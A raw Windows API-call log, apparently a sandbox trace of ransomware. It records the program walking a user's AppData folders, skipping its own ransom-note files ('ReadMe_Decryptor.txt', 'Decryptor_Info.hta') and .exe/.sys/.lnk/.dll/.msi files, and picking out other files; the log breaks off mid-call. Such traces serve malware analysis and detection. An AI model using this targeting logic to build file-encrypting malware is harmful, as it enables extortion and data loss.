[0084.954] FindNextFileW (in: hFindFile=0x781f78, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Startup", cAlternateFileName="")) returned 1 [0084.954] lstrcmpW (lpString1="Startup", lpString2=".") returned 1 [0084.954] lstrcmpW (lpString1="Startup", lpString2="..") returned 1 [0084.954] lstrlenW (lpString="Startup") returned 7 [0084.954] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\", lpString2="Startup" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup" [0084.954] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" [0084.954] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\") returned 92 [0084.954] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x7810d0 [0084.955] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.955] FindNextFileW (in: hFindFile=0x7810d0, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.955] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.955] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.955] FindNextFileW (in: hFindFile=0x7810d0, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0084.955] lstrcmpW (lpString1="desktop.ini", lpString2=".") returned 1 [0084.955] lstrcmpW (lpString1="desktop.ini", lpString2="..") returned 1 [0084.955] lstrcmpiW (lpString1="desktop.ini", lpString2="ReadMe_Decryptor.txt") returned -1 [0084.955] lstrcmpiW (lpString1="desktop.ini", lpString2="Decryptor_Info.hta") returned 1 [0084.955] PathFindExtensionW (pszPath="desktop.ini") returned=".ini" [0084.955] lstrcmpiW (lpString1=".ini", lpString2=".exe") returned 1 [0084.955] lstrcmpiW (lpString1=".ini", lpString2=".sys") returned -1 [0084.955] lstrcmpiW (lpString1=".ini", lpString2=".lnk") returned -1 [0084.955] lstrcmpiW (lpString1=".ini", lpString2=".dll") returned 1 [0084.955] lstrcmpiW (lpString1=".ini", lpString2=".msi") returned -1 [0084.955] FindNextFileW (in: hFindFile=0x7810d0, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0084.955] FindClose (in: hFindFile=0x7810d0 | out: hFindFile=0x7810d0) returned 1 [0084.956] FindNextFileW (in: hFindFile=0x781f78, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0084.956] FindClose (in: hFindFile=0x781f78 | out: hFindFile=0x781f78) returned 1 [0084.956] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x28d71a60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d207440, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0xae, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0084.956] FindClose (in: hFindFile=0x77c988 | out: hFindFile=0x77c988) returned 1 [0084.956] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xaef15879, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0084.956] lstrcmpW (lpString1="Templates", lpString2=".") returned 1 [0084.956] lstrcmpW (lpString1="Templates", lpString2="..") returned 1 [0084.956] lstrlenW (lpString="Templates") returned 9 [0084.956] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="Templates" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates" [0084.956] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\" [0084.956] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\") returned 74 [0084.956] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Templates\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x77c988 [0084.957] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.957] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xaef15879, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.957] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.957] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.957] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28cff640, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xaef15879, ftLastWriteTime.dwHighDateTime=0x1ca042b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0084.957] FindClose (in: hFindFile=0x77c988 | out: hFindFile=0x77c988) returned 1 [0084.957] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xef632f84, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Themes", cAlternateFileName="")) returned 1 [0084.958] lstrcmpW (lpString1="Themes", lpString2=".") returned 1 [0084.958] lstrcmpW (lpString1="Themes", lpString2="..") returned 1 [0084.958] lstrlenW (lpString="Themes") returned 6 [0084.958] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="Themes" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes" [0084.958] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\" [0084.958] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\") returned 71 [0084.958] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x77c988 [0084.959] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.959] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d71a60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xef632f84, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.959] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.959] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.959] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd9d7d3c0, ftLastWriteTime.dwHighDateTime=0x1d3373f, nFileSizeHigh=0x0, nFileSizeLow=0x9cfab, dwReserved0=0x0, dwReserved1=0x0, cFileName="TranscodedWallpaper.jpg", cAlternateFileName="TRANSC~1.JPG")) returned 1 [0084.959] lstrcmpW (lpString1="TranscodedWallpaper.jpg", lpString2=".") returned 1 [0084.959] lstrcmpW (lpString1="TranscodedWallpaper.jpg", lpString2="..") returned 1 [0084.959] lstrcmpiW (lpString1="TranscodedWallpaper.jpg", lpString2="ReadMe_Decryptor.txt") returned 1 [0084.959] lstrcmpiW (lpString1="TranscodedWallpaper.jpg", lpString2="Decryptor_Info.hta") returned 1 [0084.959] PathFindExtensionW (pszPath="TranscodedWallpaper.jpg") returned=".jpg" [0084.959] lstrcmpiW (lpString1=".jpg", lpString2=".exe") returned 1 [0084.959] lstrcmpiW (lpString1=".jpg", lpString2=".sys") returned -1 [0084.959] lstrcmpiW (lpString1=".jpg", lpString2=".lnk") returned -1 [0084.959] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0084.959] lstrcmpiW (lpString1=".jpg", lpString2=".msi") returned -1 [0084.960] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0x90) returned 0x72a920 [0084.960] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xd6) returned 0x7813e0 [0084.960] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x72a920 | out: hHeap=0x6d0000) returned 1 [0084.960] RtlAllocateHeap (HeapHandle=0x6d0000, Flags=0x0, Size=0xc0) returned 0x73bff0 [0084.960] HeapFree (in: hHeap=0x6d0000, dwFlags=0x0, lpMem=0x7813e0 | out: hHeap=0x6d0000) returned 1 [0084.960] FindNextFileW (in: hFindFile=0x77c988, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd9d7d3c0, ftLastWriteTime.dwHighDateTime=0x1d3373f, nFileSizeHigh=0x0, nFileSizeLow=0x9cfab, dwReserved0=0x0, dwReserved1=0x0, cFileName="TranscodedWallpaper.jpg", cAlternateFileName="TRANSC~1.JPG")) returned 0 [0084.960] FindClose (in: hFindFile=0x77c988 | out: hFindFile=0x77c988) returned 1 [0084.963] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd9d7d3c0, ftLastWriteTime.dwHighDateTime=0x1d3373f, nFileSizeHigh=0x0, nFileSizeLow=0x9cfab, dwReserved0=0x0, dwReserved1=0x0, cFileName="TranscodedWallpaper.jpg", cAlternateFileName="TRANSC~1.JPG")) returned 0 [0084.963] FindClose (in: hFindFile=0x708d18 | out: hFindFile=0x708d18) returned 1 [0084.963] FindNextFileW (in: hFindFile=0x709c80, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4f71aa70, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x27c7d150, ftLastAccessTime.dwHighDateTime=0x1d3aaba, ftLastWriteTime.dwLowDateTime=0x27c7d150, ftLastWriteTime.dwHighDateTime=0x1d3aaba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Word", cAlternateFileName="")) returned 1 [0084.963] lstrcmpW (lpString1="Word", lpString2=".") returned 1 [0084.964] lstrcmpW (lpString1="Word", lpString2="..") returned 1 [0084.964] lstrlenW (lpString="Word") returned 4 [0084.964] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="Word" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word" [0084.964] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\" [0084.964] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\") returned 61 [0084.964] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x708d18 [0084.966] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0084.966] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4f71aa70, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x27c7d150, ftLastAccessTime.dwHighDateTime=0x1d3aaba, ftLastWriteTime.dwLowDateTime=0x27c7d150, ftLastWriteTime.dwHighDateTime=0x1d3aaba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.968] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0084.968] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0084.968] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27c7d150, ftCreationTime.dwHighDateTime=0x1d3aaba, ftLastAccessTime.dwLowDateTime=0x27c7d150, ftLastAccessTime.dwHighDateTime=0x1d3aaba, ftLastWriteTime.dwLowDateTime=0x27c7d150, ftLastWriteTime.dwHighDateTime=0x1d3aaba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="STARTUP", cAlternateFileName="")) returned 1 [0084.968] lstrcmpW (lpString1="STARTUP", lpString2=".") returned 1 [0084.968] lstrcmpW (lpString1="STARTUP", lpString2="..") returned 1 [0084.968] lstrlenW (lpString="STARTUP") returned 7 [0084.968] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\", lpString2="STARTUP" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP" [0084.968] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\" [0084.968] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\") returned 69 [0084.968] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Word\\STARTUP\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x781f78 [0085.015] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.015] FindNextFileW (in: hFindFile=0x781f78, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27c7d150, ftCreationTime.dwHighDateTime=0x1d3aaba, ftLastAccessTime.dwLowDateTime=0x27c7d150, ftLastAccessTime.dwHighDateTime=0x1d3aaba, ftLastWriteTime.dwLowDateTime=0x27c7d150, ftLastWriteTime.dwHighDateTime=0x1d3aaba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.015] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.015] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.015] FindNextFileW (in: hFindFile=0x781f78, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27c7d150, ftCreationTime.dwHighDateTime=0x1d3aaba, ftLastAccessTime.dwLowDateTime=0x27c7d150, ftLastAccessTime.dwHighDateTime=0x1d3aaba, ftLastWriteTime.dwLowDateTime=0x27c7d150, ftLastWriteTime.dwHighDateTime=0x1d3aaba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0085.015] FindClose (in: hFindFile=0x781f78 | out: hFindFile=0x781f78) returned 1 [0085.016] FindNextFileW (in: hFindFile=0x708d18, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27c7d150, ftCreationTime.dwHighDateTime=0x1d3aaba, ftLastAccessTime.dwLowDateTime=0x27c7d150, ftLastAccessTime.dwHighDateTime=0x1d3aaba, ftLastWriteTime.dwLowDateTime=0x27c7d150, ftLastWriteTime.dwHighDateTime=0x1d3aaba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0085.016] FindClose (in: hFindFile=0x708d18 | out: hFindFile=0x708d18) returned 1 [0085.016] FindNextFileW (in: hFindFile=0x709c80, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x27c7d150, ftCreationTime.dwHighDateTime=0x1d3aaba, ftLastAccessTime.dwLowDateTime=0x27c7d150, ftLastAccessTime.dwHighDateTime=0x1d3aaba, ftLastWriteTime.dwLowDateTime=0x27c7d150, ftLastWriteTime.dwHighDateTime=0x1d3aaba, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0085.016] FindClose (in: hFindFile=0x709c80 | out: hFindFile=0x709c80) returned 1 [0085.016] FindNextFileW (in: hFindFile=0x709a08, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb458e750, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb458e750, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Mozilla", cAlternateFileName="")) returned 1 [0085.016] lstrcmpW (lpString1="Mozilla", lpString2=".") returned 1 [0085.016] lstrcmpW (lpString1="Mozilla", lpString2="..") returned 1 [0085.016] lstrlenW (lpString="Mozilla") returned 7 [0085.016] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="Mozilla" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla" [0085.016] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\" [0085.016] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\") returned 54 [0085.016] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x709c80 [0085.017] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.017] FindNextFileW (in: hFindFile=0x709c80, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb264df80, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb458e750, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb458e750, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0085.017] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0085.017] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0085.017] FindNextFileW (in: hFindFile=0x709c80, lpFindFileData=0xcce128 | out: lpFindFileData=0xcce128*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xb458e750, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xb458e750, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0xb458e750, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Extensions", cAlternateFileName="EXTENS~1")) returned 1 [0085.017] lstrcmpW (lpString1="Extensions", lpString2=".") returned 1 [0085.017] lstrcmpW (lpString1="Extensions", lpString2="..") returned 1 [0085.017] lstrlenW (lpString="Extensions") returned 10 [0085.017] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\", lpString2="Extensions" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions" [0085.018] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\" [0085.018] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\") returned 65 [0085.018] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Mozilla\\Extensions\\*", fInfoLevelId=0x0, lpFindFileData=0xcce128, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xcce128) returned 0x708d18 [0085.187] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0085.187] FindNextFileW (in: hFindFile=0x708d18, 